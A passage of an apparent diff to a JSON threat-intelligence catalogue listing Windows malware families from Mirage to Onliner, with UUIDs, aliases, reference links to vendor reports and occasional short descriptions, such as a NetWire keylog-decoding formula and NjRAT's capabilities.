"https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" + ] + }, + "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", + "value": "Mirage", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" + ] + }, + "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", + "value": "MirageFox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", + "https://twitter.com/PhysicalDrive0/status/830070569202749440", + "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", + "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html" + ] + }, + "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", + "value": "Mirai", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" + ] + }, + "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", + "value": "Misdat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "MixFox", + "ModPack" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" + ] + }, + "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", + "value": "Misfox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" + ] + }, + "uuid": "4c786624-4a55-46e6-849d-b65552034235", + "value": "Miuref", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", + "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + ] + }, + "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", + "value": "MM Core", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", + "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" + ] + }, + "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", + "value": "MobiRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" + ] + }, + "uuid": 
"7132c1de-9a3f-4f08-955f-ab6f7a09e17d", + "value": "Mocton", + "description": "" + }, + { + "meta": { + "synonyms": [ + "straxbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", + "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", + "https://twitter.com/physicaldrive0/status/670258429202530306" + ] + }, + "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", + "value": "ModPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", + "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", + "https://breakingmalware.com/malware/moker-part-2-capabilities/", + "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network", + "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/" + ] + }, + "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", + "value": "Moker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", + "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" + ] + }, + "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "value": "Mokes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", + "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", + "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" + ] + }, + "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", + "value": "Mole", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", + "http://www.clearskysec.com/iec/", + 
"https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" + ] + }, + "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", + "value": "Molerat Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CoinMiner" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", + "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" + ] + }, + "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", + "value": "Monero Miner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" + ] + }, + "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", + "value": "MoonWind", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" + ] + }, + "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", + "value": "Morphine", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", + "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", + "https://www.f-secure.com/weblog/archives/00002227.html", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" + ] + }, + "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", + "value": "Morto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/" + ] + }, + "uuid": 
"663df641-d396-4e93-93bd-bb9609ceb0ba", + "value": "Mosquito", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" + ] + }, + "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", + "value": "Moure", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", + "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" + ] + }, + "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", + "value": "mozart", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpk", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3", + "value": "MPK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", + "value": "MPKBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", + "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/" + ] + }, + "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", + "value": "Multigrain POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", + 
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", + "value": "murkytop", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" + ] + }, + "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", + "value": "Murofet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", + "http://vms.drweb.ru/virus/?_is=1&i=8477920" + ] + }, + "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", + "value": "Mutabaha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" + ] + }, + "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", + "value": "MyKings Spreader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", + "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" + ] + }, + "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", + "value": "MyloBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", + "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" + ] + }, + "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", + "value": "N40", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" + ] + }, + "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", + "value": "Nabucur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", + "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" + ] + }, + "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", + "value": "Nagini", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + ] + }, + "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", + "value": "Naikon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", + "value": "Nanocore RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" + ] + }, + "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", + "value": "NanoLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", + "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", + "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" + ] + }, + "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", + "value": "Narilam", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", + "https://www.ncsc.gov.uk/alerts/turla-group-malware" + ] + }, + "uuid": "d8295eba-60ef-4900-8091-d694180de565", + "value": "Nautilus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", + "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" + ] + }, + "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", + "value": "NavRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "nucurs" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", + "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", + "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", + "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", + "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", + "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/", + "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/" + ] + }, + "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", + "value": "Necurs", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nemain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", + "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" + ] + }, + "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", + "value": "Nemim", + "description": "" + }, + { + 
"meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", + "value": "NetC", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ScoutEagle" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", + "value": "NETEAGLE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger", + "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" + ] + }, + "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", + "value": "Netrepser", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", + "http://www.netsupportmanager.com/index.asp", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", + "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" + ] + }, + "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", + "value": "NetSupportManager RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TravNet" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", + "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", + "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" + ] + }, + "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", + "value": "NetTraveler", + "description": "" + }, + { + "meta": { + 
"synonyms": [ + "Recam" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", + "https://www.circl.lu/pub/tr-23/", + "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" + ] + }, + "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", + "value": "NetWire RC", + "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", + "https://www.ncsc.gov.uk/alerts/turla-group-malware" + ] + }, + "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", + "value": "Neuron", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Kasidet" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", + "http://securitykitten.github.io/an-evening-with-n3utrino/", + "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", + "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", + "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", + 
"http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", + "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", + "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", + "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/" + ] + }, + "uuid": "3760920e-4d1a-40d8-9e60-508079499076", + "value": "Neutrino", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Jimmy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", + "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", + "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" + ] + }, + "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", + "value": "Neutrino POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", + "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" + ] + }, + "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", + "value": "NewCore RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", + "https://asert.arbornetworks.com/lets-talk-about-newposthings/", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", + "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" + ] + }, + "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", + "value": "NewPosThings", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels", + 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", + "value": "NewsReels", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" + ] + }, + "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", + "value": "NewCT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot", + "https://twitter.com/benkow_/status/789006720668405760" + ] + }, + "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", + "value": "Nexster Bot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger", + "https://twitter.com/PhysicalDrive0/status/842853292124360706", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/" + ] + }, + "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", + "value": "NexusLogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", + "https://research.checkpoint.com/ramnits-network-proxy-servers/" + ] + }, + "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", + "value": "Ngioweb", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove", + "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html" + ] + }, + "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130", + "value": "nitlove", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" + ] + }, + "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", + "value": "Nitol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bladabindi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", + "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", + "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", + "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", + "value": "NjRAT", + "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer", + "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" + ] + }, + "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", + "value": "Nocturnal Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ] + }, + "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", + "value": "Nokki", + "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" + ] + }, + "uuid": "6207668d-af17-44a6-97a2-e1b448264529", + "value": "Nozelesn (Decryptor)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", + "https://twitter.com/malwrhunterteam/status/910952333084971008", + "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", + "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" + ] + }, + "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", + "value": "nRansom", + "description": "" + }, + { + "meta": { + "synonyms": [ + "nymain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", + "https://www.cert.pl/en/news/single/nymaim-revisited/", + "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", + "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", + "https://bitbucket.org/daniel_plohmann/idapatchwork" + ] + }, + "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", + "value": "Nymaim", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2", + "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" + ] + }, + "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", + "value": "Nymaim2", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" + ] + }, + "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", + "value": "OddJob", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", + 
"https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" + ] + }, + "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", + "value": "Odinaff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", + "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", + "https://securelist.com/the-devils-in-the-rich-header/84348/", + "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", + "https://securelist.com/olympic-destroyer-is-still-alive/86169/", + "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", + "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", + "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" + ] + }, + "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", + "value": "Olympic Destroyer", + "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", + "https://twitter.com/malwrhunterteam/status/1001461507513880576" + ] + }, + "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", + "value": "OneKeyLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", + "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" + ] + }, + "uuid": "82733125-da67-44ff-b2ac-b16226088211", + "value": "ONHAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", + "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html", + "https://www.f-secure.com/weblog/archives/00002764.html" + ] + }, + "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", + "value": "OnionDuke", + "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. " + }, + { + "meta": { + "synonyms": [ + "SBot", + "Onliner" + ], + "type": [], + "refs": [ + 